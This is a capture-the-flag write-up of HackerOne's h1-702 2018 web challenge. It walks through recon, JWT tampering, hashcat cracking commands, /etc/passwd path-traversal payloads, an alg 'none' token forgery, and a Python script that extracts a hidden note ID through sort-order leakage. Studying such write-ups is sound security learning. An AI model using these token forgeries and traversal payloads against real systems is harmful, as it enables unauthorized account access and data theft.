h1-702 CTF 2018 Web Challenge Writeup

This is a writeup of how I went about solving the web challenge from the h1-702 CTF, including my thought process as I navigated through the wrong and right paths to reach a solution. If you're only interested in what the correct steps were, skip to the TL;DR at the end.

Upon navigating to the challenge URL, we're greeted with a message:

Notes RPC Capture The Flag
Welcome to HackerOne's H1-702 2018 Capture The Flag event. Somewhere on this server, a service can be found that allows a user to securely stores notes. In one of the notes, a flag is hidden. The goal is to obtain the flag.
Good luck, you might need it.

Alright, let's see if we can find some other files on the webserver. The two best options from here are checking robots.txt and running a file/directory search using common paths. Since /robots.txt gives a 404 error, we can move on to the next option with dirsearch:

$ python3 dirsearch.py -u http://159.203.178.9/ -e php,html,txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, html, txt | Threads: 10 | Wordlist size: 6657

Target: http://159.203.178.9/

[03:11:32] Starting:
[03:11:33] 403 -  299B  - /.ht_wsr.txt
... <many more 403 errors>
[03:11:38] 200 -  597B  - /index.html
[03:11:40] 200 -   11KB - /README.html
[03:11:40] 415 -   24B  - /rpc.php
...

Task Completed

We've discovered two new files! Let's check out README.html first.

This page details how to interact with an RPC service that's accessible through the other file dirsearch discovered: rpc.php. To summarize, the service allows for the creation, retrieval, and deletion of text snippets ("notes"). In order to make my testing of this service easier, I started by writing a simple Python wrapper for it (later referenced as rpc.py):

import requests

url = "http://159.203.178.9/rpc.php"
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

GET = requests.get
POST = requests.post

def request(r, params=None, json=None):
	headers = {'Authorization': token, 'Accept': 'application/notes.api.v1+json'}
	resp = r(url, params=params, json=json, headers=headers)
	try:
		return resp.json()
	except ValueError:
		# body was not valid JSON (e.g. an empty 500 response), so return the raw response
		return resp

def getNotesMetadata():
	return request(GET, params={'method': 'getNotesMetadata'})

def getNote(note_id):
	return request(GET, params={'method': 'getNote', 'id': note_id})

def createNote(note, note_id=None):
	if note_id is None:
		return request(POST, params={'method': 'createNote'}, json={'note': note})
	else:
		return request(POST, params={'method': 'createNote'}, json={'id': note_id, 'note': note})

def resetNotes():
	return request(POST, params={'method':'resetNotes'})

Initial Analysis

After messing around with the service's methods and carefully reading the information provided in the README file, I identified some initial high-potential attack vectors to explore:

Modifying the JWT
Path traversal through note IDs
Server information disclosure through PHP errors

Vector 1: Modifying the JWT

One important note from the README is that the service uses JSON Web Tokens (JWTs) to authenticate users:

Authenticating to the service can be done through the Authorization header. When provided a valid JWT, the service will authenticate the user and allow to query metadata, retrieve a note, create new notes, and delete all notes.

We can view the contents of the token provided in the README by base64-decoding each segment individually, but for simplicity I like to let jwt.io handle the work:
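The same decoding can be reproduced locally. The following is a minimal Python 3 sketch, not part of the original tooling; the helper name `b64url_decode` is my own. It restores the padding that JWTs strip and prints the header and payload of the README token.

```python
import base64
import json

def b64url_decode(segment):
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    padded = segment + "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(padded)

# Token provided in the challenge README
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

# A JWT is three dot-separated segments: header, payload, signature
header_b64, payload_b64, signature_b64 = token.split(".")
header = json.loads(b64url_decode(header_b64))
payload = json.loads(b64url_decode(payload_b64))

print(header)   # {'typ': 'JWT', 'alg': 'HS256'}
print(payload)  # {'id': 2}
```

The payload carries nothing but a user id of 2, and the header declares HS256 as the signing algorithm.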

From this I hypothesized that the payload's id field needs to be changed to another user (likely id=1) who created the note with the flag in it. However, in-place modification of the payload will invalidate the JWT's signature. Given this, there were two possible options apparent to me:

Hope for a broken implementation and attempt the modification anyway
Crack the server's JWT secret so that a valid signature can be created after payload modification

Ignoring the Signature

If ignoring the signature, all that needs to be done to change the payload's id field to 1 is to replace the payload section of the provided JWT with the base64 encoding of {"id":1} (with padding stripped) - eyJpZCI6MX0 - yielding a new token:

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
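For anyone who would rather script the swap than edit the string by hand, here is a small Python 3 sketch. The helper names `b64url_encode` and `swap_payload` are hypothetical and not taken from rpc.py. It replaces only the payload segment and leaves the header and signature untouched.

```python
import base64
import json

def b64url_encode(data):
    """Base64url-encode bytes and strip the trailing '=' padding, as JWTs do."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def swap_payload(token, new_payload):
    """Return `token` with its payload segment replaced; header and signature are kept."""
    header_b64, _old_payload, signature_b64 = token.split(".")
    # Compact separators reproduce the space-free {"id":1} form
    payload_json = json.dumps(new_payload, separators=(",", ":"))
    return ".".join([header_b64, b64url_encode(payload_json.encode("ascii")), signature_b64])

original = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
tampered = swap_payload(original, {"id": 1})
print(tampered)
```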

Unfortunately, after changing the token in rpc.py to this new token, all requests failed with an authentication error, indicating that the signature was in fact being checked:

>>> rpc.getNotesMetadata()
{u'authorization': u'is invalid'}

Cracking the Secret

It's possible that the JWT implementation was configured to use a weak user-defined secret instead of random bytes. To test this, we can attempt to crack the secret using password lists and/or full-on bruteforce. Thankfully, hashcat supports cracking JWTs. I attempted cracking with CrackStation's 15GB wordlist as well as up to a 6-character bruteforce, but both routes yielded no matches. I considered continuing the bruteforce with higher character lengths, but decided it was best to explore other vectors first. For anyone curious, the relevant hashcat commands are:

$ hashcat -m 16500 -a 0 <path_to_jwt> <path_to_wordlist> # use wordlist
$ hashcat -m 16500 -a 3 <path_to_jwt> ?a?a?a?a?a?a # 6-character bruteforce
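To make it clearer what the cracker is doing under the hood, here is a rough Python 3 sketch of a wordlist attack on an HS256 token. It is far slower than hashcat and is only meant to illustrate the check: an HS256 signature is an HMAC-SHA256 over the `header.payload` string, so a candidate secret is correct if it reproduces the signature. The function names, the demo secret `hunter2`, and the tiny wordlist are all made up for illustration.

```python
import base64
import hashlib
import hmac

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def sign_hs256(signing_input, secret):
    """HS256 signature: HMAC-SHA256 over 'header.payload', base64url-encoded."""
    digest = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return b64url_encode(digest)

def crack(token, candidates):
    """Return the first candidate secret that reproduces the token's signature, else None."""
    signing_input, _, signature = token.rpartition(".")
    for candidate in candidates:
        if hmac.compare_digest(sign_hs256(signing_input, candidate), signature):
            return candidate
    return None

# Demo against a token signed locally with a deliberately weak, made-up secret
demo_input = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6Mn0"
demo_token = demo_input + "." + sign_hs256(demo_input, b"hunter2")
print(crack(demo_token, [b"password", b"letmein", b"hunter2"]))
```

Against the real challenge token this approach found nothing, which matches the hashcat results above.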

Vector 2: Path Traversal

The README mentions that notes are stored in files instead of a database:

Each note is stored in a secure file that consists of a unique key, the note, and the epoch of when the note was created.

Because of this, path traversal using the note id parameter via getNote could be a plausible vector. This quickly appeared to be a dead-end after trying numerous different traversal payloads, some of which are below:

>>> rpc.getNote('../../../../../../../../etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('../../../../../../../../etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd')
{u'note': u'is not found'}
>>> rpc.getNote('/etc/passwd\x00')
{u'note': u'is not found'}
>>> rpc.getNote('rpc.php')
{u'note': u'is not found'}
>>> rpc.getNote('../rpc.php')
{u'note': u'is not found'}

Vector 3: Server Information Disclosure

The display_errors configuration setting is enabled by default in PHP, meaning that uncaught errors can be rendered in HTTP responses. Runtime error messages can often reveal sensitive application information, so with this vector I hoped to discover other PHP files that rpc.php might be invoking, potentially widening the attack surface or revealing critical details. Because PHP is a weakly typed language, it's often trivial to trigger errors by providing unexpected input types, which in this case would be non-strings. Specific to the Notes RPC service, non-string inputs can be provided through query string array parameters and JSON data types.

Query String Array Parameters

In PHP, query string parameters will be treated as an Array type if a pair of brackets immediately follows the parameter name like so: foo[]=123. By default the example parameter is still accessed by the name "foo", so references to it without validating its type first will likely cause errors. Unfortunately this method did not cause any (visible) errors with the Notes RPC service:

>>> rpc.request(rpc.GET, params={'method[]': 'getNotesMetadata'})
{u'method': u'not found'}
>>> rpc.request(rpc.GET, params={'method': 'getNote', 'id[]':'xyz'})
{u'note': u'is not found'}

JSON Data Types

The JSON specification supports multiple different data types. Using sub-objects ({}) in the JSON arguments to createNote, I was able to trigger internal server errors (code 500) but unfortunately no error output was provided:

>>> rpc.createNote([])
{u'url': u'/rpc.php?method=getNote&id=a5fb2de26211ddcfc5713a6bed0c6328'}
>>> rpc.createNote({})
<Response [500]>
>>> rpc.createNote({}).text
u''
>>> rpc.createNote('asdf', note_id=[])
{u'url': u'/rpc.php?method=getNote&id=Array'}
>>> rpc.createNote('asdf', note_id={})
<Response [500]>
>>> rpc.createNote('asdf', note_id={}).text
u''

Re-evaluating the Target

With none of the initial vectors providing progress, I decided to re-evaluate the service. After considering and briefly attempting other common vulnerabilities such as SQL/Command Injection, it became apparent that there may have been something more evident that I had missed. In my re-evaluation of how the service uses JWTs, I started looking into past vulnerabilities in common PHP JWT libraries. This quickly led me to discover that there was a critical issue found in many libraries back in 2015 - a warning about it still being shown on jwt.io (which I somehow glossed over earlier):

The details of this vulnerability can be found here. A summary of it:

The JWT specification includes a none algorithm (specified in the alg field of the token header)
This algorithm is intended to be used when the integrity of a token has already been verified
Vulnerable implementations treated tokens signed with the none algorithm as valid regardless of their signature
This can be exploited by simply changing the alg field of the header to none and modifying the payload section to include any desired data
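The flaw is easier to see in code. Below is a hypothetical Python 3 sketch of what a vulnerable verifier might look like next to a safer one. The challenge's actual PHP code is not available, so every function here is an assumption made for illustration. The vulnerable version lets the token pick its own algorithm, while the pinned version always verifies with HS256 regardless of what the header claims.

```python
import base64
import hashlib
import hmac
import json

def b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def payload_if_hs256_valid(token, secret):
    """Check the HMAC-SHA256 signature and return the payload, or raise."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    mac = hmac.new(secret, (header_b64 + "." + payload_b64).encode("ascii"), hashlib.sha256)
    if not hmac.compare_digest(b64url_encode(mac.digest()), signature_b64):
        raise ValueError("authorization is invalid")
    return json.loads(b64url_decode(payload_b64))

def verify_vulnerable(token, secret):
    """Hypothetical flawed verifier: trusts the alg field supplied by the client."""
    header_b64, payload_b64, _signature = token.split(".")
    if json.loads(b64url_decode(header_b64)).get("alg") == "none":
        # The flaw: the signature is never checked when the token asks for "none"
        return json.loads(b64url_decode(payload_b64))
    return payload_if_hs256_valid(token, secret)

def verify_pinned(token, secret):
    """Safer variant: the server decides the algorithm, not the token."""
    return payload_if_hs256_valid(token, secret)

# A forged token: alg set to none, arbitrary payload, meaningless signature
forged = ".".join([
    b64url_encode(b'{"typ":"JWT","alg":"none"}'),
    b64url_encode(b'{"id":1}'),
    "ignored",
])
print(verify_vulnerable(forged, b"server-secret"))  # payload accepted without any valid signature
```

Calling `verify_pinned` on the same forged token raises `ValueError`, since no signature computed with the server's secret will match.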

Attempting the Exploit

Using the modified token created earlier (in "Ignoring the Signature"), we simply need to change the header from:

{"typ":"JWT","alg":"HS256"}

to:

{"typ":"JWT","alg":"none"}

Like the modified payload, the new header just needs to be base64 encoded. Replacing the token header with this modified version gives the new token:

token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6MX0.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"

With the token now changed in rpc.py, let's try calling getNotesMetadata:

>>> rpc.getNotesMetadata()
{u'count': 1, u'epochs': [u'1528911533']}

Success! We now have the epoch of what's likely the flag note. But wait, notes are accessed by id not epoch... Guess we're not done yet.

Re-evaluating the Target (Again)

Now armed with the target note's epoch, I decided that I probably needed to find a way to extract its id based on the epoch value. Per the README, note IDs are randomly generated unless one is provided when calling createNote:

An optional ID. If not provided, it'll generate a 16 byte random string.

Noting that, I decided the two best approaches moving forward were:

Looking into attacking the PRNG that generates note IDs
Revisiting the recon stage to see if anything was missed

Attacking the PRNG

If we could reverse the PRNG that generates note IDs, we could in theory recover the generated ID associated with the target note's epoch. Generally, attacking PRNGs involves a lot of guessing unless the target application is open-source. In the case of the Notes RPC service, we could hypothesize that PHP's mt_rand or rand functions are being used, both of which are known to be cryptographically insecure. However, attacks against these functions would be difficult to perform because the generated numbers are bounded and we don't know how the charset is assembled. Given that, I decided to move on to something else so as not to waste too much time with guessing.

Revisiting Recon

In the initial recon stage I had neglected to check the HTML source of the files discovered on the server. Lo and behold, a very helpful HTML comment can be found in the source of README.html:

<!--
    Version 2 is in the making and being tested right now, it includes an optimized file format that
    sorts the notes based on their unique key before saving them. This allows them to be queried faster.
    Please do NOT use this in production yet!
-->

Jackpot! This gives us two new pieces of information:

There's a version 2 API
The next attack vector will probably involve version 2's sorting feature - getNotesMetadata being a primary candidate for that

The Final Attack

The README file details the necessity of an Accept header that specifies the API version being used:

Accept: application/notes.api.v1+json

So to access the version 2 API, we likely just need to change v1 to v2, like so:

Accept: application/notes.api.v2+json
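One way to make the version switchable in a wrapper like rpc.py is to build the headers from a version number. This is only a sketch: the `build_headers` helper and its `api_version` parameter are hypothetical and are not part of the original rpc.py, which hard-codes the v1 header.

```python
def build_headers(token, api_version=1):
    """Build the request headers, selecting the API version through the Accept media type."""
    return {
        "Authorization": token,
        "Accept": "application/notes.api.v{}+json".format(api_version),
    }

# Placeholder token for illustration only
print(build_headers("<jwt>", api_version=2)["Accept"])  # application/notes.api.v2+json
```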

After changing this in rpc.py and creating a few test notes, the theorized change to getNotesMetadata is confirmed: note epochs are now sorted by the lexicographical order of their note ID strings, not numerically by epoch as they were in version 1:

>>> rpc.createNote('asdf', note_id='C')
{u'url': u'/rpc.php?method=getNote&id=C'}
>>> rpc.createNote('asdf', note_id='A')
{u'url': u'/rpc.php?method=getNote&id=A'}
>>> rpc.createNote('asdf', note_id='B')
{u'url': u'/rpc.php?method=getNote&id=B'}
>>> rpc.getNotesMetadata()
{u'count': 4, u'epochs': [u'1529727460', u'1529727462', u'1529727456', u'1528911533']}

With this new sorting method we can perform a character-by-character bruteforce to extract the flag note's ID based on where a new note with a crafted ID appears in the list of note epochs generated by getNotesMetadata.

Example

In case my explanation of the issue was a bit confusing, let's consider a theoretical note with an id of Y:

>>> sorted(['X', 'Y'])
['X', 'Y']
>>> sorted(['Z', 'Y'])
['Y', 'Z']

When a note with an ID of X is created, it will appear before Y in the sorted-by-ID list of epochs. If a note with an ID of Z is created, it will appear after Y in the list of epochs. Once this pivot occurs, we're able to determine that the unknown character must be between X and Z (exclusive), narrowing it down to Y in this case. That pivot search can be continued on a character-by-character basis until the full ID is extracted.
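The pivot search can be tried out offline before pointing it at the server. The Python 3 sketch below simulates the ordering leak locally, assuming the server sorts IDs the same way Python compares strings (an assumption, since the server code isn't visible). It is a simplified variation of the idea and not the attack.py script shown later: probes are left unpadded, and `sorts_after` and `extract_id` are names I made up.

```python
import string

CHARSET = sorted(string.ascii_letters + string.digits)

def sorts_after(probe_id, secret_id):
    """Local stand-in for the server-side sort: would the probe note be listed after the secret one?"""
    return probe_id > secret_id

def extract_id(secret_id, max_len=64):
    """Recover secret_id one character at a time using only the ordering oracle."""
    known = ""
    while len(known) < max_len:
        # Walk the charset in order until a probe first lands after the secret (the pivot)
        pivot = next(
            (i for i, c in enumerate(CHARSET) if sorts_after(known + c, secret_id)),
            len(CHARSET),
        )
        if pivot == 0:
            # Even the smallest character sorts after the secret: nothing is left to recover
            break
        # The character just before the pivot is the secret's character at this position
        known += CHARSET[pivot - 1]
    return known

print(extract_id("Y"))
print(extract_id("EelHIXsu"))
```

Note that `extract_id` only ever calls `sorts_after`; it never reads `secret_id` directly, which mirrors what the attacker can observe through getNotesMetadata.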

Executing the Attack

I wrote a Python script to automate the extraction process (later referenced as attack.py):

import rpc

charset = sorted("0123456789abcdef")
target = "1528911533" # target note's epoch

key = ['?'] * 16 # key should be 16 characters
pos = 0
while pos < len(key):
	found = False
	for i in range(len(charset)):
		# create key attempt using known values + current brute char
		tmp_key = key[:]
		tmp_key[pos] = charset[i]
		tmp_key_str = ''.join(tmp_key).replace('?', charset[0])
		
		# create note with id of key attempt to compare against unknown key
		rpc.resetNotes()
		rpc.createNote('asdf', note_id=tmp_key_str)
		tmp_epoch = rpc.getNote(tmp_key_str)['epoch']

		# use new note's epoch index to detect if next char has been found:
		# index 1 means the new note sorted after the flag note, so the
		# previous charset entry is the correct character
		if rpc.getNotesMetadata()['epochs'][1] == tmp_epoch:
			key[pos] = charset[i - 1]
			pos += 1
			found = True
			print(''.join(key).replace('?', ''))
			break
	if not found:
		print('failed to get next char')
		break

Oddly, the script failed when I tried to run it:

$ python attack.py
0
failed to get next char

After investigating and attempting to find out why, I recalled an important piece of info from the README:

400	| Returned when the ID does not match /\A[a-zA-Z0-9]+\z/.

Although the randomly generated note IDs only contained hex characters, note IDs can contain any characters in the a-zA-Z0-9 charset. After implementing this change in attack.py:

import string
charset = sorted(string.ascii_letters + string.digits)

The script still failed with the same result as before. I theorized that the comparisons may be failing due to the target id being longer than the randomly generated IDs (16 characters). After changing the key length in attack.py to an arbitrarily larger number:

key = ['?'] * 128

The script finally started working!

E
Ee
Eel
...
EelHIXsuAw4FXCa9ep
EelHIXsuAw4FXCa9epe
EelHIXsuAw4FXCa9eped
failed to get next char

Sweet! Let's try to get that note now:

>>> rpc.getNote('EelHIXsuAw4FXCa9eped')
{u'note': u'is not found'}

WHAT?!?! After ~~wanting to tear my hair out and~~ taking another look at the script, it occurred to me that the comparison would fail on the last character because I didn't account for the final case where the two strings would be equal. To counter this, the value of the last character needs to be incremented (d -> e):

>>> rpc.getNote('EelHIXsuAw4FXCa9epee')
{u'note': u'NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==', u'epoch': u'1528911533'}
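The off-by-one on the final character can be reproduced with plain string comparisons. This sketch assumes the server's ordering matches Python's string ordering, and the `probe` helper is a hypothetical stand-in that mirrors how attack.py pads its guesses with charset[0] (the character '0') up to the 128-character key length.

```python
target = "EelHIXsuAw4FXCa9epee"   # the real note ID, 20 characters
pad_to = 128                      # key length used by attack.py

def probe(prefix):
    """Build the ID attack.py would submit: known prefix padded with '0' (charset[0])."""
    return prefix.ljust(pad_to, "0")

# Mid-string: the correct character still sorts before the target, because the
# target's remaining characters compare greater than the '0' padding.
print(probe("Ee") < target)                    # True
print(probe("Ef") > target)                    # True, the pivot: script records 'e'

# Final position: the correct guess is the target plus padding, so it already
# sorts after the target and the script records the previous character, 'd'.
print(probe("EelHIXsuAw4FXCa9epee") > target)  # True
print(probe("EelHIXsuAw4FXCa9eped") < target)  # True
```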

Base64-decode that:

>>> import base64
>>> base64.b64decode('NzAyLUNURi1GTEFHOiBOUDI2bkRPSTZINUFTZW1BT1c2Zw==')
'702-CTF-FLAG: NP26nDOI6H5ASemAOW6g'

We got the flag!

Conclusion

Thank you to HackerOne for hosting this fun and original challenge!

Valid Steps TL;DR

Find the README detailing the Notes RPC service
Exploit a JWT library flaw to change the provided JWT's user id to 1
See that the epoch of the flag note can now be accessed
Find the HTML comment in the README mentioning API version 2 and its sorting functionality
Exploit the sorting in version 2's getNotesMetadata method - extract unknown flag note's id based on string ordering

Additional Info

The final version of rpc.py can be found here.

The final version of attack.py can be found here.

As a side note, I'd like to mention that the key extraction could be made much more efficient by implementing a binary search algorithm. However, because the search space is relatively small, the added efficiency isn't really necessary so I opted to not implement it for the sake of simplicity.
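For the curious, here is roughly what the binary search variant could look like. This is a Python 3 sketch run against a local stand-in for the server (the `oracle` function, which assumes Python's string ordering matches the server's), not a tested replacement for attack.py. `find_char` and the probe bookkeeping are hypothetical names.

```python
import string

CHARSET = sorted(string.ascii_letters + string.digits)

def find_char(sorts_after, known):
    """Binary-search the charset for the first character whose probe sorts after the secret.

    `sorts_after(probe_id)` is the ordering oracle. Returns the recovered character,
    or None when even the smallest character overshoots (the ID is complete).
    """
    lo, hi = 0, len(CHARSET)
    while lo < hi:
        mid = (lo + hi) // 2
        if sorts_after(known + CHARSET[mid]):
            hi = mid          # pivot is at mid or earlier
        else:
            lo = mid + 1      # pivot is after mid
    return CHARSET[lo - 1] if lo > 0 else None

secret = "EelHIXsuAw4FXCa9epee"
probes = []  # records every probe so the total can be counted

def oracle(probe_id):
    """Local stand-in for one reset/create/metadata round trip against the service."""
    probes.append(probe_id)
    return probe_id > secret

known = ""
while True:
    next_char = find_char(oracle, known)
    if next_char is None:
        break
    known += next_char

print(known, len(probes))
```

With a 62-character charset this needs at most six probes per position, compared to as many as 62 for the linear scan.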

Questions or Feedback?

Contact me on Twitter: @jsploit
